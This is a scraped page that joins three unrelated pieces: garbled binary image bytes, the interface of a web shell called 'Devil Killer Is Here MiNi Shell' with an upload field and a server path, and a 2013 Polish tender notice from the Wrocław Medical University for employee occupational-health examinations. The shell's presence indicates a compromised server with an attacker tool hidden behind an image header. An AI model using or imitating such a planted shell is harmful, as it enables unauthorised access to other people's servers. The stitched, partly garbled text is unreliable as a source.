JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130312/37357-N-2013.html

<p class="kh_header"><b>Wrocław: UMW / AZ / PN - 19/13 Świadczenie usług związanych z wykonaniem badań lekarskich wstępnych, okresowych i kontrolnych pracowników Uniwersytetu Medycznego we Wrocławiu, z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz wystawianie orzeczeń lekarskich dla celów przewidzianych w Kodeksie Pracy (Dz. U. Nr 69,  poz. 332  z  25  czerwca 1996 r.  ze zm.)</b><br>
<b>Numer ogłoszenia: 37357 - 2013; data zamieszczenia: 12.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Medyczny im. Piastów Śląskich , ul. Pasteura 1, 50-367 Wrocław, woj. dolnośląskie, tel. 71 784 11 74; 784 11 73, faks 71 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UMW / AZ / PN - 19/13 Świadczenie usług związanych z wykonaniem badań lekarskich wstępnych, okresowych i kontrolnych pracowników Uniwersytetu Medycznego we Wrocławiu, z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz wystawianie orzeczeń lekarskich dla celów przewidzianych w Kodeksie Pracy (Dz. U. Nr 69,  poz. 332  z  25  czerwca 1996 r.  ze zm.).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> UMW/AZ/PN-19/13 Świadczenie usług związanych z wykonaniem badań lekarskich wstępnych, okresowych i kontrolnych pracowników Uniwersytetu Medycznego we Wrocławiu, z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz wystawianie orzeczeń lekarskich dla celów przewidzianych w Kodeksie Pracy (Dz. U. Nr 69, poz. 332 z 25 czerwca 1996 r. ze zm.)
Przedmiotem zamówienia jest wykonywanie usług medycznych w terminie od dnia podpisania umowy do dnia 31.12.2015 r obejmujących profilaktyczne badania lekarskie z zakresu medycyny pracy świadczonych na rzecz osób przyjmowanych do pracy i pracowników Uniwersytetu Medycznego we Wrocławiu, w zakresie określonym w  rozporządzeniu Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, 
z zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 332, ze zm.), a w szczególności:
1) przeprowadzanie badań profilaktycznych osób przyjmowanych do pracy i pracowników   (wstępnych,  okresowych i kontrolnych przewidzianych w Kodeksie Pracy  i ustawie o transporcie drogowym w przypadku badań przeprowadzanych dla pracowników zatrudnionych na stanowiskach kierowców,) 
2)  wydawanie orzeczeń lekarskich kończących badanie profilaktyczne  w zakresie:
a)  braku przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy lub  
b)  zastrzeżenie przeciwwskazań zdrowotnych do pracy na określonym stanowisku pracy. 
3) przeprowadzanie badań diagnostycznych i konsultacji specjalistycznych niezbędnych  do celów przewidzianych KP oraz  w ustawie o transporcie drogowym;
4) badanie lekarskie dla celów sanitarno- epidemiologicznych oraz wydaniem orzeczenia i  założeniem książeczek zdrowia
5) udział w zakładowych komisjach BHP w ramach sprawowania opieki zdrowotnej nad pracownikami, o których Zamawiający będzie powiadamiał Wykonawcę najpóźniej na 7 dni przed posiedzeniem;
6)  monitorowanie stanu zdrowia osób pracujących zaliczanych do grup szczególnego ryzyka,  ocena możliwości wykonywania pracy uwzględniającej stan zdrowia i zagrożenia występujące w miejscu pracy;
7)  prowadzenie analiz stanu zdrowia pracowników, w szczególności w celu ustalenia przyczyn  chorób zawodowych i wypadków przy pracy;
8)  inicjowanie działań na rzecz ochrony i promocji zdrowia pracowników oraz udzielanie pomocy w ich realizacji;
9)  gromadzenie, przechowywanie i przekazywanie orzeczeń lekarskich wystawionych dla osób objętych profilaktyczną opieką lekarską, dotyczących:
a)  utraty przez pracownika zdolności do wykonywania dotychczasowej pracy (art. 43 pkt 2 Kodeksu pracy Kp.),
b) konieczności przeniesienia pracownika do innej pracy ze względu na stwierdzenie szkodliwego wpływu wykonywanej pracy na zdrowie pracownika (art. 55 § 1  K.p.),
c) stwierdzających, że ze względu na stan ciąży kobieta nie powinna wykonywać pracy dotychczasowej (art. 179 § 1 pkt 2 K.p),
d) stwierdzających, że dana praca zagraża zdrowiu młodocianego (art. 201 § 2 Kodeksu pracy),
e)  braku przeciwwskazań do wykonywania pracy na określonym stanowisku (art. 229 § 4 K.p.),
f) stwierdzających u pracownika objawy wskazujące na powstawanie choroby zawodowej (art. 230 § 1 K.p.),
g)  stwierdzających niezdolność do wykonywania dotychczasowej pracy u pracownika, który uległ wypadkowi przy pracy lub u którego stwierdzono chorobę zawodową, lecz nie zaliczono go do żadnej z grup inwalidów (art. 231 Kodeksu pracy).
2. Organizacja świadczenia usług medycznych:
1) Wykonawcą badań określonych w pkt. 1 mogą być placówki medyczne, Przychodnie ZOZ lub NZOZ posiadające jednostkę służby medycyny pracy, zarejestrowane w rejestrze prowadzonym, zgodnie z ustawą z 15 kwietnia 2011 roku o działalności leczniczej (Dz. U. Nr 112, poz. 654),  dysponujące kadrą lekarską o następujących specjalnościach:
  -   medycyny pracy  wpisanego do rejestru lekarzy wojewódzkiego ośrodka medycyny pracy,
- medycyny pracy z  uprawnieniem badań lekarskich kandydatów na kierowców,
- laryngologa, 
- neurologa,
- hematologa,
- okulisty,
- dermatologa,
- alergologa,
- radiologa,
- ortopedy,
- psychiatry,
- psychologa
Lekarze specjaliści winni posiadać zaświadczenia o nadanym numerze wykonywania zawodu lekarza
2)  Bieżąca realizacja usług medycznych w jednostce służby medycyny pracy będzie wykonywana w dni robocze od poniedziałku  do piątku, od godz.7:00 do godz. 14:30, i dotyczyć będzie  sprawowania profilaktycznej opieki zdrowotnej z zakresu medycyny pracy dla pracowników  Uniwersytetu Medycznego we Wrocławiu w okolicy ul. Borowskiej 211. Odległość maksymalna placówki Medycyny Pracy od ul. Borowskiej 211 wynosi 2 km 
Przewidywana ilość osób do badania w okoliczch ul. Borowskiej 211, w poszczególnych latach: 2013 - 300 osób, 2014 - 400 osób, 2015 - 400 osób.
Wykonawca oświadcza, że jest jednostką służby medycyny pracy w rozumieniu ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125, poz. 1317 z późn. zm.), oraz  że gabinety, w których będą wykonywane usługi medyczne, spełniają standardy określone w rozporządzeniu Ministra Zdrowia z dnia 02 lutego 2011 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2011 r. Nr 31, poz. 158).
3)  Badania profilaktyczne  wykonywane będą na podstawie skierowania wystawionego przez Dział  Kadr  UMW, w którym Dział BHP UMW wypisze informacje dotyczące określenia stanowiska pracy,  czynników szkodliwych dla zdrowia oraz aktualne wyniki badań i pomiarów czynników szkodliwych dla zdrowia na tym stanowisku. Wskazane jest, aby lekarz uzupełnił informacje pracodawcy o spostrzeżenia z przeprowadzonych wizytacji stanowiska pracy  oraz określił rodzaj badań  laboratoryjnych i innych badań specjalistycznych niezbędnych do wystawienia orzeczenia lekarskiego
Badania specjalistyczne wskazane indywidualnie przez lekarza medycyny pracy mogą dotyczyć konsultacji: alergologicznych, laryngologicznych, neurologicznych, okulistycznych, ortopedycznych, hematologicznych, radiologicznych, psychologicznych, psychiatrycznych czy dermatologicznych wykonanych zgodnie z Rozporządzeniem MPiPS (Dz.U. nr 148 poz. 973 z 01.12.98 r.) w sprawie bezpieczeństwa i higieny pracy na stanowiskach, w zależności od zakresu narażeń wykazanych w skierowaniu.  
Termin wykonania badań  Laboratoryjnych  i  okulistycznych  w placówce Wykonawcy  nastąpi w ciągu  3 dni roboczych od dnia zgłoszenia się osoby skierowanej na badania w placówce Wykonawcy, natomiast w przypadku stwierdzenia konieczności wykonania specjalistycznego badania konsultacyjnego czy badania dodatkowego, niezbędnego dla prawidłowej oceny stanu zdrowia osoby przyjmowanej do pracy lub pracownika, termin oczekiwania na to badanie nie przekroczy (7) siedmiu dni roboczych od dnia zgłoszenia się osoby skierowanej na badania. W uzasadnionych przypadkach  wymagających powtórnego badania specjalistycznego lub badania dodatkowego termin ten może być ustalony indywidualnie między Zamawiającym i Wykonawcą ale nie  dłuższy od 14 dni roboczych.
Po zakończeniu badania profilaktycznego pracownik badany  otrzymuje orzeczenie lekarskie o:
- Braku przeciwwskazań zdrowotnych do wykonywania pracy na wskazanym stanowisku - czyli o zdolności do podjęcia lub kontynuowania pracy w określonych warunkach.
lub
-  Istnieniu przeciwwskazań zdrowotnych do wykonywania pracy na wskazanym stanowisku - czyli o niezdolności do podjęcia lub kontynuowania pracy w określonych warunkach.
To samo orzeczenie otrzymuje pracodawca - z zachowaniem tajemnicy lekarskiej, bez informacji dotyczących stanu zdrowia pracownika.
Jeśli pracownik lub pracodawca nie zgadzają się z treścią orzeczenia lekarskiego przysługuje im prawo do odwołania i wykonania powtórnego badania profilaktycznego w Wojewódzkim Ośrodku Medycyny Pracy lub w Instytucie Medycyny Pracy. Wniosek na badanie odwoławcze składa się za pośrednictwem lekarza, który wydał kwestionowane orzeczenie.
Wykonawca zobowiązany jest do prowadzenia i przechowywania dokumentacji medycznej osób objętych badaniami profilaktycznymi przez okres obowiązywania umowy, zgodnie z rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej
nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w
Kodeksie pracy (Dz. U. Nr 69, poz. 332, ze zm.) i zapewnia ochronę danych zawartych w tej dokumentacji  zgodnie z ustawą z dnia 27 czerwca 1997 r. o służbie medycyny pracy (Dz. U. z 2004 r. Nr 125, poz. 1317 ze zm.) oraz rozporządzeniem Ministra Zdrowia z dnia 29 lipca 2010 r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów (Dz. U. z 2010 r Nr 149, poz. 1002).
Po zakończeniu realizacji umowy Wykonawca przekaże w/w dokumentację medyczną, albo następnemu Wykonawcy wskazanemu przez Zamawiającego, albo do właściwego terytorialnie wojewódzkiego ośrodka medycyny pracy - zgodnie z pisemną decyzją Zamawiającego  uwzględniającą przepis § 10 ust. 3 Rozporządzenia Ministra Zdrowia z dnia 29 lipca 2010r.
4) Zamawiający przedstawił planowany zakres badań na Formularzu ofertowym nr 1. 
Natomiast realizacja zamówień na badania profilaktyczne odbywać się będzie zgodnie z rzeczywistymi potrzebami Zamawiającego, które mogą się różnić od poszczególnych ilości przedstawionych w Formularzu ofertowym 1.   
Należności za realizację badań profilaktycznych rozliczane będą w cyklu miesięcznym na podstawie cennika ofertowego stanowiącego  załącznik do Umowy. 
Zamawiający udzieli zamówienia wybranemu Wykonawcy do kwoty ofertowej określonej w Formularzu ofertowym nr 1 lub do dnia 31.12.2015 r.                                        
Zamawiający  wymaga, aby ceny jednostkowe poszczególnych badań, na podstawie których określona zostanie cena ofertowa były niezmienne przez okres trwania umowy z zastrzeżeniem możliwości wzrostu cen w roku 2014 i 2015 wyłącznie o wskaźnik wzrostu cen od towarów i usług konsumpcyjnych ogłaszany za ubiegły rok obwieszczeniem Prezesa Głównego Urzędu (informacje o wysokości wskaźnika są zamieszczane np. na oficjalnej stronie internetowej GUS: www.stat.gov.pl) jeżeli będzie on wyższy lub równy 6%.  Wówczas o konieczności zmiany ceny w roku 2014 i 2015 Wykonawca zawiadomi pisemnie Zamawiającego najpóźniej w terminie  30 dni przed  planowaną zmianą cen badań.
Zamawiający dopuszcza wprowadzoną w trakcie realizacji zamówienia ustawową zmianę stawki podatku VAT na świadczone usługi. Powyższe zmiany wymagają sporządzenia aneksu do umowy.
5) Rozliczenia pomiędzy Wykonawcą a Zamawiającym będą dokonywane w złotych polskich,  zgodnie z ustawą z 07.07.1994 r. o denominacji złotego (Dz.U. nr 84 z 1994 r. poz. 386 z  późn. zm.).
6) Należności za zlecone i wykonane przez  Wykonawcę badania profilaktyczne w ciągu miesiąca kalendarzowego Zamawiający będzie regulował przelewem na podstawie Faktur VAT wystawionych przez Wykonawcę, których wartość obliczona będzie na podstawie cenników ofertowych bądź cenników zmienionych o których mowa w  pkt. 4. Płatność za prawidłowo wystawioną fakturę VAT z dołączonym do niej raportem wykonanych badań  w danym miesiącu, nastąpi przelewem w terminie  21 dni  od daty otrzymania faktury przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.10.00.00-0, 85.12.00.00-6, 85.12.11.00-4, 85.12.12.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium w postępowaniu UMW/AZ/PN-19/13</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób przeznaczonych do realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i specjalizacji niezbędnej do wykonania zamówienia,  oraz informacją o podstawie do dysponowania tymi osobami (wzór - załącznik  nr  4 do Siwz).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku na zasadzie - spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy  z cennikiem ofertowym realizacji zamówienia netto i brutto  (wzór  zał.  1 do Siwz); 2. Oświadczenie o spełnianiu warunków o których mowa w art. 22 ust. 1 Pzp   (wzór -  załącznik nr 2 do Siwz); 3. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 24 ust.1 Pz.p (wzór - załącznik nr 3 do Siwz); 4. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 5. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 6. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 7. Wykaz osób przeznaczonych do realizacji zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i specjalizacji niezbędnej do wykonania zamówienia,  oraz informacją o podstawie do dysponowania tymi osobami (wzór - załącznik  nr  4 do Siwz); 8. Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, o ile nie wynikają one z przepisów prawa lub innych dokumentów złożonych w ofercie.
9. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej (wzór - załącznik nr 5 do Siwz)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty wybranego Wykonawcy, w zakresie:
a) terminu realizacji  badań profilaktycznych: 
Zmiana jest dopuszczalna w wypadku wystąpienia okoliczności, za które Wykonawca nie ponosi odpowiedzialności, skutkujących niemożnością dotrzymania przez niego terminu realizacji, określonego w umowie. Wówczas termin ten może ulec przedłużeniu, nie więcej jednak niż o czas trwania tych okoliczności.
b) ustawowej wysokości stawki podatku VAT:
Jeżeli w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla  usług należących do przedmiotu zamówienia, strony dokonają odpowiedniej zmiany wynagrodzenia umownego brutto.
c) wejścia w życie innych niż wymienionych w pkt. b) regulacji prawnych po dacie wejścia umowy w życie, wywołujących potrzebę jej zmiany;
d)  możliwości wzrostu cen usług w roku 2014 i 2015 wyłącznie o wskaźnik wzrostu cen od towarów i usług konsumpcyjnych ogłaszany  za  ubiegły rok  obwieszczeniem Prezesa Głównego Urzędu (informacje o wysokości wskaźnika są zamieszczane np. na oficjalnej stronie internetowej GUS: www.stat.gov.pl) jeżeli będzie on wyższy lub równy 6%.  Wówczas o konieczności zmiany ceny w roku 2014 i 2015 Wykonawca zawiadomi pisemnie Zamawiającego najpóźniej w terminie  30 dni przed  planowaną zmianą cen badań.
e)  zmiana danych dotyczących oznaczenia Zamawiającego i/lub Wykonawcy.
Powyższe zmiany wymagają sporządzenia  aneksu   do  umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umed.wroc.pl link przetargi ZZP 2013 nr PN-19/13<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.umed.wroc.pl link przetargi ZZP 2013 nr PN-19/13.</p>
